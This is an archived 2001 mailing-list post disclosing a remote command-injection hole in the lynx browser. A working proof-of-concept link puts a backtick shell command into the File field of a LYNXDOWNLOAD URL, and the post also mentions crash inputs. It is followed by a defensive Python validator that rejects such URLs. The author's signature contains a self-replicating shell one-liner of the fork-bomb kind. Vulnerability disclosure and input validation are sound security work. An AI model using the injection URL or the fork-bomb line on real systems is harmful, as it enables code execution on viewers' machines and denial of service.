While poking around lynx protocol handling routines, I found this very big, ugly remote hole:

<a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test"> CLICK HERE </a>

It allows remote execution of any code on the viewer's machine. Also, by setting the 'Method' field to 0 or more, you may crash lynx, but it isn't as exciting as the above URL. Also, it's possible to pass /dev/zero as 'File', also not funny.

Greetings,

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
To iterate is human, to recurse divine [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
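The URL in the post puts a backtick-quoted shell command (with its space percent-encoded) into the File field, which the download handler then interpolates into a command line; the negative Method value and /dev/zero as File are the other two defects it mentions. As an added illustration of the defender's side, not lynx's code and not part of the post, the validator below shows the input checks that refuse all three before any field reaches a shell or an open() call. The field names Method, File and SugFile are taken from the URL in the post; the MAX_METHOD bound, the /tmp download directory and the parse_fields/check helper names are assumptions made for this example.

```python
import os
import re
from pathlib import Path
from urllib.parse import unquote

# Illustrative validator for LYNXDOWNLOAD-style URLs (constructed example,
# not lynx's own code). Each check corresponds to one problem in the post:
# shell metacharacters in File, an out-of-range Method, a device node as File.

SCHEME = "lynxdownload://"
KEYS = ("Method", "File", "SugFile")
MAX_METHOD = 16        # assumed: largest valid index into the download-method table
DOWNLOAD_DIR = "/tmp"  # assumed: directory the browser writes temporary downloads to

# Any of these in a value that is later pasted into a shell command lets the
# URL author run arbitrary commands (the post's URL relies on backticks).
SHELL_META = set("`$;&|<>(){}[]*?!~\\\"'\n\r\t ")


def parse_fields(url):
    """Split 'LYNXDOWNLOAD://Method=N/File=path/SugFile=name' into a dict.

    File may itself contain '/', so the split happens on '/Key=' boundaries
    rather than on every slash. Values are percent-decoded. Raises ValueError
    for a wrong scheme, an unknown key or a duplicated key.
    """
    if not url.lower().startswith(SCHEME):
        raise ValueError("not a LYNXDOWNLOAD URL")
    rest = url[len(SCHEME):]
    fields = {}
    for part in re.split(r"/(?=(?:Method|File|SugFile)=)", rest):
        key, sep, value = part.partition("=")
        if not sep or key not in KEYS:
            raise ValueError(f"unknown or malformed field: {part!r}")
        if key in fields:
            raise ValueError(f"duplicate field: {key}")
        fields[key] = unquote(value)
    return fields


def check(url, download_dir=DOWNLOAD_DIR, max_method=MAX_METHOD):
    """Return the list of reasons the URL must be refused; empty means acceptable."""
    try:
        fields = parse_fields(url)
    except ValueError as exc:
        return [str(exc)]
    problems = [f"missing field {k}" for k in KEYS if k not in fields]
    if problems:
        return problems

    # Method indexes a table of download methods, so only a small non-negative
    # integer is meaningful. The post reports that other values crash lynx;
    # bounding the index is the natural guard.
    method = fields["Method"]
    if not method.isdigit() or int(method) > max_method:
        problems.append(f"Method out of range: {method!r}")

    # Neither path field may carry shell metacharacters, because the
    # downloader builds a command line around them.
    for key in ("File", "SugFile"):
        bad = sorted(set(fields[key]) & SHELL_META)
        if bad:
            problems.append(f"shell metacharacter in {key}: {bad!r}")

    # File must be an absolute path that stays inside the download directory
    # after lexical normalisation (so '/tmp/../dev/zero' is caught) and, if it
    # already exists, must be a regular file rather than a device node.
    file_path = fields["File"]
    if not os.path.isabs(file_path):
        problems.append("File is not an absolute path")
    else:
        normalised = os.path.normpath(file_path)
        base = Path(download_dir).parts
        if Path(normalised).parts[:len(base)] != base:
            problems.append(f"File outside download directory: {normalised!r}")
        if os.path.exists(normalised) and not os.path.isfile(normalised):
            problems.append(f"File is not a regular file: {normalised!r}")

    # SugFile is only a suggested name, so it must not carry a directory part.
    if os.sep in fields["SugFile"] or fields["SugFile"] in ("", ".", ".."):
        problems.append("SugFile is not a plain file name")
    return problems


if __name__ == "__main__":
    # The URL from the post, and a constructed well-formed one for contrast.
    for u in ("LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test",
              "LYNXDOWNLOAD://Method=0/File=/tmp/L1234-0TMP.html/SugFile=index.html"):
        print(u, "->", check(u) or "accepted")
```

Returning every reason rather than the first one makes the output useful in a log: the post's URL is rejected three times over (Method, shell metacharacters, relative File), so a single lax check elsewhere would not be enough to let it through. Metacharacter rejection is a second line of defence; the primary fix in any downloader is to stop building a shell command string from the fields at all and pass them as separate arguments.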
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:45:47 PDT